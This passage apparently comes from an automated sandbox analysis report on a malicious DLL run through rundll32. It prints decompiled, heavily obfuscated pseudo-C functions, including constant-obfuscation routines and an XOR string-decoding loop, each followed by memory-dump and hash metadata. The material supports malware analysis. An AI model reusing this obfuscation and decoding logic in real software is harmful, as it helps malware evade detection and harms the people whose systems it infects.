                                                                                                                      					}
                                                                                                                      					_v544 = 0xaf74ff;
                                                                                                                      					_v544 = _v544 + 0xc134;
                                                                                                                      					_v544 = _v544 ^ 0x00b03631;
                                                                                                                      					_t99 = E002CBA68(_v548, _v536, _v556,  &_v520, _v528);
                                                                                                                      					_t119 =  &(_t119[3]);
                                                                                                                      					_t117 =  &_v520 + _t99 * 2;
                                                                                                                      					while(1) {
                                                                                                                      						_t97 =  &_v520;
                                                                                                                      						__eflags = _t117 - _t97;
                                                                                                                      						if(_t117 <= _t97) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						__eflags =  *_t117 - 0x5c;
                                                                                                                      						if( *_t117 != 0x5c) {
                                                                                                                      							L10:
                                                                                                                      							_t117 = _t117 - 2;
                                                                                                                      							__eflags = _t117;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t85 =  &_v544;
                                                                                                                      						 *_t85 = _v544 - 1;
                                                                                                                      						__eflags =  *_t85;
                                                                                                                      						if( *_t85 == 0) {
                                                                                                                      							__eflags = _t117;
                                                                                                                      							L14:
                                                                                                                      							_t105 = 0x2c7b739;
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					goto L14;
                                                                                                                      					L15:
                                                                                                                      					__eflags = _t105 - 0x787a9f3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t97;
                                                                                                                      			}























                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 33L
                                                                                                                      • API String ID: 0-1382935120
                                                                                                                      • Opcode ID: 3ed81fb55678b2904ab08b893e38d90eb4dc865844257a74deeb17f7ec9b7fb5
                                                                                                                      • Instruction ID: b5559c48b73e5b86e928d580dcda6bb51fa08e2a8c54231966474c21894689b5
                                                                                                                      • Opcode Fuzzy Hash: 3ed81fb55678b2904ab08b893e38d90eb4dc865844257a74deeb17f7ec9b7fb5
                                                                                                                      • Instruction Fuzzy Hash: 7A5164715183419BC788CF24C58A46FBBE4FFC4348F509A1DF9D696220D3709A59CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E002C0D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t64;
                                                                                                                      				void* _t81;
                                                                                                                      				void* _t85;
                                                                                                                      				signed int _t94;
                                                                                                                      				signed int _t95;
                                                                                                                      				void* _t97;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t64);
                                                                                                                      				_v20 = 0xc35745;
                                                                                                                      				_t97 = 0;
                                                                                                                      				_t81 = 0xe709e41;
                                                                                                                      				_t94 = 0x4c;
                                                                                                                      				_v20 = _v20 / _t94;
                                                                                                                      				_v20 = _v20 ^ 0x00058dee;
                                                                                                                      				_v24 = 0xf1d8fd;
                                                                                                                      				_v24 = _v24 + 0xffffe7cd;
                                                                                                                      				_v24 = _v24 + 0xffff1b1a;
                                                                                                                      				_v24 = _v24 << 0xc;
                                                                                                                      				_v24 = _v24 ^ 0x0dbd879b;
                                                                                                                      				_v28 = 0xdb2a24;
                                                                                                                      				_v28 = _v28 + 0x4b2b;
                                                                                                                      				_v28 = _v28 | 0xa0f26509;
                                                                                                                      				_v28 = _v28 + 0x79c0;
                                                                                                                      				_v28 = _v28 ^ 0xa0fe0b2f;
                                                                                                                      				_v4 = 0xb750f2;
                                                                                                                      				_v4 = _v4 >> 0xe;
                                                                                                                      				_v4 = _v4 ^ 0x000727f7;
                                                                                                                      				_v8 = 0x72e718;
                                                                                                                      				_t95 = 0x6b;
                                                                                                                      				_v8 = _v8 / _t95;
                                                                                                                      				_v8 = _v8 ^ 0x00056d3a;
                                                                                                                      				_v12 = 0x47eeb9;
                                                                                                                      				_v12 = _v12 + 0xffffe987;
                                                                                                                      				_v12 = _v12 ^ 0x0043781c;
                                                                                                                      				_v16 = 0xdf1994;
                                                                                                                      				_v16 = _v16 + 0xffff4376;
                                                                                                                      				_v16 = _v16 ^ 0x00d54791;
                                                                                                                      				do {
                                                                                                                      					while(_t81 != 0x3b92be8) {
                                                                                                                      						if(_t81 == 0x73b901c) {
                                                                                                                      							E002D3672();
                                                                                                                      							_t81 = 0xe212545;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t81 == 0x9bcb632) {
                                                                                                                      								if(E002CACD3(_a8) != 0) {
                                                                                                                      									_t97 = 1;
                                                                                                                      								} else {
                                                                                                                      									_t81 = 0x73b901c;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t81 == 0xe212545) {
                                                                                                                      									E002B68DE(_v4, _v8, _v12, _v16,  *0x2d5c9c);
                                                                                                                      								} else {
                                                                                                                      									if(_t81 != 0xe709e41) {
                                                                                                                      										goto L13;
                                                                                                                      									} else {
                                                                                                                      										_push(_t81);
                                                                                                                      										_push(_t81);
                                                                                                                      										_t85 = 0x60;
                                                                                                                      										 *0x2d5c9c = E002C3512(_t85);
                                                                                                                      										_t81 = 0x3b92be8;
                                                                                                                      										continue;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L17:
                                                                                                                      						return _t97;
                                                                                                                      					}
                                                                                                                      					if(E002B9A7D(_a12) == 0) {
                                                                                                                      						_t81 = 0xe212545;
                                                                                                                      						goto L13;
                                                                                                                      					} else {
                                                                                                                      						_t81 = 0x9bcb632;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					goto L17;
                                                                                                                      					L13:
                                                                                                                      				} while (_t81 != 0xf0e3ed);
                                                                                                                      				goto L17;
                                                                                                                      			}

















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +K
                                                                                                                      • API String ID: 0-3601299342
                                                                                                                      • Opcode ID: 3cd54db39f41048f58c776fba22fa38b849857b225207553149cd7c112b456fc
                                                                                                                      • Instruction ID: ee7d1d019d54ea16cb58b19dc958d6088a25214943277de29e22d4aec4897328
                                                                                                                      • Opcode Fuzzy Hash: 3cd54db39f41048f58c776fba22fa38b849857b225207553149cd7c112b456fc
                                                                                                                      • Instruction Fuzzy Hash: 1441FF72628301DBC758CF25C885A2FBBE1EBD8318F108E1DF59656260D3B0C919CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E002BAB66(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                      				void* _t42;
                                                                                                                      				signed int _t46;
                                                                                                                      				short* _t63;
                                                                                                                      				signed int _t64;
                                                                                                                      				signed int _t66;
                                                                                                                      				signed int _t74;
                                                                                                                      				unsigned int _t75;
                                                                                                                      				unsigned int _t76;
                                                                                                                      				short* _t79;
                                                                                                                      				signed int* _t80;
                                                                                                                      				signed int* _t81;
                                                                                                                      				signed int* _t82;
                                                                                                                      				unsigned int _t84;
                                                                                                                      				void* _t90;
                                                                                                                      				short _t92;
                                                                                                                      				void* _t94;
                                                                                                                      				void* _t95;
                                                                                                                      
                                                                                                                      				_t82 =  *(_t94 + 0x1c);
                                                                                                                      				_push( *(_t94 + 0x28));
                                                                                                                      				_push( *(_t94 + 0x28));
                                                                                                                      				_push(_t82);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E002BCF25(_t42);
                                                                                                                      				 *(_t94 + 0x24) = 0xc8fa9a;
                                                                                                                      				_t80 =  &(_t82[1]);
                                                                                                                      				 *(_t94 + 0x24) =  *(_t94 + 0x24) + 0x149f;
                                                                                                                      				 *(_t94 + 0x24) =  *(_t94 + 0x24) ^ 0x00c381cf;
                                                                                                                      				 *(_t94 + 0x34) = 0x8cac1;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) | 0xffff7fdf;
                                                                                                                      				 *(_t94 + 0x34) =  *(_t94 + 0x34) ^ 0xfffda11e;
                                                                                                                      				 *(_t94 + 0x20) = 0x3c356c;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) * 0x2a;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 0x83f9;
                                                                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) ^ 0x09ee4754;
                                                                                                                      				_t66 =  *_t82;
                                                                                                                      				_t81 =  &(_t80[1]);
                                                                                                                      				_t46 =  *_t80 ^ _t66;
                                                                                                                      				 *(_t94 + 0x28) = _t66;
                                                                                                                      				 *(_t94 + 0x2c) = _t46;
                                                                                                                      				_t24 = _t46 + 1; // 0x3c356d
                                                                                                                      				_t84 =  !=  ? (_t24 & 0xfffffffc) + 4 : _t24;
                                                                                                                      				_t95 = _t94 + 0xc;
                                                                                                                      				_t63 = E002C3512(_t84 + _t84);
                                                                                                                      				 *((intOrPtr*)(_t95 + 0x28)) = _t63;
                                                                                                                      				if(_t63 != 0) {
                                                                                                                      					_t92 = 0;
                                                                                                                      					_t79 = _t63;
                                                                                                                      					_t90 =  >  ? 0 :  &(_t81[_t84 >> 2]) - _t81 + 3 >> 2;
                                                                                                                      					if(_t90 != 0) {
                                                                                                                      						_t64 =  *(_t95 + 0x18);
                                                                                                                      						do {
                                                                                                                      							_t74 =  *_t81;
                                                                                                                      							_t81 =  &(_t81[1]);
                                                                                                                      							_t75 = _t74 ^ _t64;
                                                                                                                      							 *_t79 = _t75 & 0x000000ff;
                                                                                                                      							_t79 = _t79 + 8;
                                                                                                                      							 *((short*)(_t79 - 6)) = _t75 >> 0x00000008 & 0x000000ff;
                                                                                                                      							_t76 = _t75 >> 0x10;
                                                                                                                      							_t92 = _t92 + 1;
                                                                                                                      							 *((short*)(_t79 - 4)) = _t76 & 0x000000ff;
                                                                                                                      							 *((short*)(_t79 - 2)) = _t76 >> 0x00000008 & 0x000000ff;
                                                                                                                      						} while (_t92 < _t90);
                                                                                                                      						_t63 =  *((intOrPtr*)(_t95 + 0x24));
                                                                                                                      					}
                                                                                                                      					 *((short*)(_t63 +  *(_t95 + 0x1c) * 2)) = 0;
                                                                                                                      				}
                                                                                                                      				return _t63;
                                                                                                                      			}




















                                                                                                                      0x002bac7f
                                                                                                                      0x002bac7f
                                                                                                                      0x002bac8b

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TG
                                                                                                                      • API String ID: 0-2762469129
                                                                                                                      • Opcode ID: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction ID: 5c93e8545078b4875401e9b58d4647380903f34c94967df8e7b3d10c0e3223a3
                                                                                                                      • Opcode Fuzzy Hash: de49195854164d4ba6e370293f3bba852aaf4d501735938fb8aa480511fba751
                                                                                                                      • Instruction Fuzzy Hash: B6317E726193118BC714DF28C48546AFBE0FF88718F454B2EF889A7250D774EA19CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C109E(void* __ecx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				void* _t76;
                                                                                                                      				void* _t82;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t85;
                                                                                                                      				signed int _t86;
                                                                                                                      				signed int _t87;
                                                                                                                      				void* _t96;
                                                                                                                      				void* _t97;
                                                                                                                      				signed int* _t99;
                                                                                                                      
                                                                                                                      				_t99 =  &_v28;
                                                                                                                      				_v24 = 0xd283c4;
                                                                                                                      				_v24 = _v24 >> 8;
                                                                                                                      				_v24 = _v24 << 9;
                                                                                                                      				_t83 = __ecx;
                                                                                                                      				_t96 = 0;
                                                                                                                      				_t85 = 0x2d;
                                                                                                                      				_v24 = _v24 / _t85;
                                                                                                                      				_v24 = _v24 ^ 0x0004da81;
                                                                                                                      				_t97 = 0xc7350e4;
                                                                                                                      				_v16 = 0x64139d;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 >> 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x00062b71;
                                                                                                                      				_v28 = 0xade301;
                                                                                                                      				_v28 = _v28 ^ 0x8f618bae;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_t86 = 0x7e;
                                                                                                                      				_v28 = _v28 / _t86;
                                                                                                                      				_v28 = _v28 ^ 0x001433c5;
                                                                                                                      				_v20 = 0x6fd8b7;
                                                                                                                      				_v20 = _v20 << 5;
                                                                                                                      				_t87 = 0x39;
                                                                                                                      				_v20 = _v20 / _t87;
                                                                                                                      				_v20 = _v20 ^ 0x003ef69f;
                                                                                                                      				_v4 = 0x5f989c;
                                                                                                                      				_v4 = _v4 + 0xda74;
                                                                                                                      				_v4 = _v4 ^ 0x006bc492;
                                                                                                                      				_v12 = 0x987d41;
                                                                                                                      				_v12 = _v12 << 9;
                                                                                                                      				_v12 = _v12 + 0x3c41;
                                                                                                                      				_v12 = _v12 ^ 0x30fa219f;
                                                                                                                      				_v8 = 0x945ab1;
                                                                                                                      				_v8 = _v8 >> 2;
                                                                                                                      				_v8 = _v8 ^ 0x002dcc5b;
                                                                                                                      				do {
                                                                                                                      					while(_t97 != 0xa0feddc) {
                                                                                                                      						if(_t97 == 0xc7350e4) {
                                                                                                                      							_t97 = 0xf55d56d;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t97 == 0xf55d56d) {
                                                                                                                      								_t82 = E002C274F();
                                                                                                                      								_t99 = _t99 - 0xc + 0xc;
                                                                                                                      								_t97 = 0xa0feddc;
                                                                                                                      								_t96 = _t96 + _t82;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L7;
                                                                                                                      					}
                                                                                                                      					_t76 = E002BB782(_t83 + 4, _v4, _v12, _v8);
                                                                                                                      					_t99 =  &(_t99[2]);
                                                                                                                      					_t97 = 0x490b4c9;
                                                                                                                      					_t96 = _t96 + _t76;
                                                                                                                      					L7:
                                                                                                                      				} while (_t97 != 0x490b4c9);
                                                                                                                      				return _t96;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A<
                                                                                                                      • API String ID: 0-2278821948
                                                                                                                      • Opcode ID: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction ID: ac27bc7337bcdf5bfdc176bc645ef751f26d01682c1e357ff20032b80761f2f1
                                                                                                                      • Opcode Fuzzy Hash: 97b66c1337cb10c1d396c65a6684b4c2d0d3bf5368e036497ae656dbc9f15019
                                                                                                                      • Instruction Fuzzy Hash: 0A318D729183018FC304DE25D84941BBBE1FBD4B58F148A2DF588AB265D3B5DE28CB97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E002B8650(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				void* _t83;
                                                                                                                      				signed int _t102;
                                                                                                                      				signed int _t103;
                                                                                                                      				signed int _t104;
                                                                                                                      				signed int _t105;
                                                                                                                      				void* _t118;
                                                                                                                      				signed int _t119;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t118 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				E002BCF25(_t83);
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v32 = _v32 & 0x00000000;
                                                                                                                      				_v40 = 0x27bdd4;
                                                                                                                      				_v24 = 0x769f2a;
                                                                                                                      				_v24 = _v24 << 1;
                                                                                                                      				_v24 = _v24 ^ 0x00e6321c;
                                                                                                                      				_v8 = 0xfef45c;
                                                                                                                      				_t102 = 0x31;
                                                                                                                      				_v8 = _v8 / _t102;
                                                                                                                      				_v8 = _v8 | 0xf1ae833d;
                                                                                                                      				_v8 = _v8 ^ 0x9231f40a;
                                                                                                                      				_v8 = _v8 ^ 0x6392d2fe;
                                                                                                                      				_v16 = 0x3d43fb;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x97e6d5b2;
                                                                                                                      				_v16 = _v16 ^ 0x97eefe03;
                                                                                                                      				_v12 = 0x33c712;
                                                                                                                      				_v12 = _v12 >> 7;
                                                                                                                      				_v12 = _v12 + 0x2d9c;
                                                                                                                      				_t103 = 0x16;
                                                                                                                      				_v12 = _v12 / _t103;
                                                                                                                      				_v12 = _v12 ^ 0x00054cf8;
                                                                                                                      				_v28 = 0xb0e606;
                                                                                                                      				_v28 = _v28 | 0xfcdd39f2;
                                                                                                                      				_v28 = _v28 * 0x19;
                                                                                                                      				_v28 = _v28 ^ 0xb4c190eb;
                                                                                                                      				E002B5AE2(_t103);
                                                                                                                      				_v24 = 0x8c0b06;
                                                                                                                      				_v24 = _v24 + 0x3875;
                                                                                                                      				_v24 = _v24 ^ 0xc8b8cfa1;
                                                                                                                      				_v24 = _v24 ^ 0xc8348cde;
                                                                                                                      				_v20 = 0xa003e6;
                                                                                                                      				_t104 = 0x69;
                                                                                                                      				_v20 = _v20 / _t104;
                                                                                                                      				_t105 = 0x51;
                                                                                                                      				_v20 = _v20 / _t105;
                                                                                                                      				_v20 = _v20 ^ 0x000004c1;
                                                                                                                      				_t119 = E002BEF71(_v24, _v20);
                                                                                                                      				_push(_t119);
                                                                                                                      				_push(_v28);
                                                                                                                      				_push(_t118);
                                                                                                                      				E002B5A07(1, _v12);
                                                                                                                      				 *((short*)(_t118 + _t119 * 2)) = 0;
                                                                                                                      				return 0;
                                                                                                                      			}




















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: u8
                                                                                                                      • API String ID: 0-999499730
                                                                                                                      • Opcode ID: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction ID: 7a62e180fa3a2faf3240cbebc8af2620013c8db226fa58cdcbc5916c3c735027
                                                                                                                      • Opcode Fuzzy Hash: 18f189f9c650fbaeadc2e42c6b49d8db23d579580a1ac72df02d86a7d0229630
                                                                                                                      • Instruction Fuzzy Hash: C7311471D00209EBDB09CFA5C98AAEFBBB1FF44314F208099E515B62A0D7B55B64CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002BEC9B(void* __ecx, signed int __edx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				intOrPtr _t99;
                                                                                                                      				intOrPtr _t104;
                                                                                                                      				signed int _t114;
                                                                                                                      				signed int _t115;
                                                                                                                      				signed int _t116;
                                                                                                                      
                                                                                                                      				_v52 = _v52 & 0x00000000;
                                                                                                                      				_v48 = _v48 & 0x00000000;
                                                                                                                      				_v56 = 0x52d5fa;
                                                                                                                      				_v32 = 0xd2ae86;
                                                                                                                      				_v32 = _v32 >> 6;
                                                                                                                      				_v32 = _v32 ^ 0x0000dff8;
                                                                                                                      				_v8 = 0x945d31;
                                                                                                                      				_v8 = _v8 >> 9;
                                                                                                                      				_v8 = _v8 | 0xfea629bb;
                                                                                                                      				_t114 = __edx;
                                                                                                                      				_v8 = _v8 * 0x68;
                                                                                                                      				_v8 = _v8 ^ 0x739e55b5;
                                                                                                                      				_v16 = 0xe343a6;
                                                                                                                      				_v16 = _v16 + 0xffffaeee;
                                                                                                                      				_v16 = _v16 << 0xd;
                                                                                                                      				_v16 = _v16 ^ 0x5e55869e;
                                                                                                                      				_v28 = 0xa35055;
                                                                                                                      				_v28 = _v28 ^ 0xccdb3a8a;
                                                                                                                      				_v28 = _v28 ^ 0xcc747f7c;
                                                                                                                      				_v12 = 0x417a71;
                                                                                                                      				_t115 = 0xc;
                                                                                                                      				_v12 = _v12 / _t115;
                                                                                                                      				_v12 = _v12 + 0xffffd743;
                                                                                                                      				_v12 = _v12 ^ 0x254bb370;
                                                                                                                      				_v12 = _v12 ^ 0x25474737;
                                                                                                                      				_v36 = 0x5ce014;
                                                                                                                      				_v36 = _v36 << 0xb;
                                                                                                                      				_v36 = _v36 ^ 0xe70ab788;
                                                                                                                      				_v20 = 0x24db01;
                                                                                                                      				_t116 = 0x63;
                                                                                                                      				_v20 = _v20 * 0x3c;
                                                                                                                      				_v20 = _v20 + 0xe28f;
                                                                                                                      				_v20 = _v20 ^ 0x08ab7f21;
                                                                                                                      				_v44 = 0x4977db;
                                                                                                                      				_v44 = _v44 * 0x38;
                                                                                                                      				_v44 = _v44 ^ 0x1015e45e;
                                                                                                                      				_v24 = 0xa0027c;
                                                                                                                      				_v24 = _v24 | 0xcfe9110c;
                                                                                                                      				_v24 = _v24 + 0xffff4bac;
                                                                                                                      				_v24 = _v24 ^ 0xcfe5f801;
                                                                                                                      				_v40 = 0x81bf9e;
                                                                                                                      				_v40 = _v40 / _t116;
                                                                                                                      				_v40 = _v40 ^ 0x000d137a;
                                                                                                                      				_push(_v28);
                                                                                                                      				_push(_v16);
                                                                                                                      				_push(__ecx);
                                                                                                                      				_t99 = E002D07D7(_v12, _v36, E002BAB66(_v32, _v8, _v40), _v20);
                                                                                                                      				_t104 =  *0x2d5c8c; // 0x0
                                                                                                                      				 *((intOrPtr*)(_t104 + 4 + _t114 * 4)) = _t99;
                                                                                                                      				return E002BAE03(_v44, _v24, _v40, _t98);
                                                                                                                      			}






















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7GG%
                                                                                                                      • API String ID: 0-3444672964
                                                                                                                      • Opcode ID: 77a33a43522827b7988bc72f8aff0ef2b26dc8db63aef5a84c29ec95d63c0cb5
                                                                                                                      • Instruction ID: 9b3a47b4033023d2ba6a04fec12790498e49fccf154edb0741821abf80965a40
                                                                                                                      • Opcode Fuzzy Hash: 77a33a43522827b7988bc72f8aff0ef2b26dc8db63aef5a84c29ec95d63c0cb5
                                                                                                                      • Instruction Fuzzy Hash: FE41F3B1C01219EFCB08CFE5C98A9DEBFB1FB44314F208199D511BA260C7B51A45CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002C3512(void* __ecx) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				intOrPtr _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				signed int _t83;
                                                                                                                      				void* _t88;
                                                                                                                      
                                                                                                                      				_v36 = _v36 & 0x00000000;
                                                                                                                      				_v48 = 0xd3138f;
                                                                                                                      				_v44 = 0xbafb06;
                                                                                                                      				_v40 = 0xb4c902;
                                                                                                                      				_v28 = 0x9a00a8;
                                                                                                                      				_v28 = _v28 + 0xffff4980;
                                                                                                                      				_v28 = _v28 + 0xffff4b07;
                                                                                                                      				_v28 = _v28 ^ 0x00989527;
                                                                                                                      				_v12 = 0x37fcba;
                                                                                                                      				_v12 = _v12 + 0xffff1054;
                                                                                                                      				_v12 = _v12 ^ 0xaae49dfe;
                                                                                                                      				_v12 = _v12 | 0x5520ddcc;
                                                                                                                      				_v12 = _v12 ^ 0xfff3c0c4;
                                                                                                                      				_v8 = 0xafb0cb;
                                                                                                                      				_t88 = __ecx;
                                                                                                                      				_t83 = 0x7b;
                                                                                                                      				_v8 = _v8 / _t83;
                                                                                                                      				_v8 = _v8 << 0xb;
                                                                                                                      				_v8 = _v8 + 0xffff2cb4;
                                                                                                                      				_v8 = _v8 ^ 0x0b6cc095;
                                                                                                                      				_v24 = 0x7eb81c;
                                                                                                                      				_v24 = _v24 | 0x606632c5;
                                                                                                                      				_v24 = _v24 + 0x73a0;
                                                                                                                      				_v24 = _v24 * 0x3c;
                                                                                                                      				_v24 = _v24 ^ 0x9dca2ad3;
                                                                                                                      				_v20 = 0x11602;
                                                                                                                      				_v20 = _v20 * 0x5d;
                                                                                                                      				_v20 = _v20 + 0xd70f;
                                                                                                                      				_v20 = _v20 + 0x91d0;
                                                                                                                      				_v20 = _v20 ^ 0x006b4c23;
                                                                                                                      				_v32 = 0x7d7f;
                                                                                                                      				_v32 = _v32 + 0x7879;
                                                                                                                      				_v32 = _v32 ^ 0x000fb411;
                                                                                                                      				_v16 = 0xa8b2e1;
                                                                                                                      				_v16 = _v16 >> 0xf;
                                                                                                                      				_v16 = _v16 + 0xffff543c;
                                                                                                                      				_v16 = _v16 ^ 0xd60d7738;
                                                                                                                      				_v16 = _v16 ^ 0x29f40b7c;
                                                                                                                      				return E002B7A47(_v28, _v24, _v20, E002C5BB3(), _t88, _v32, _v16);
                                                                                                                      			}

















                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
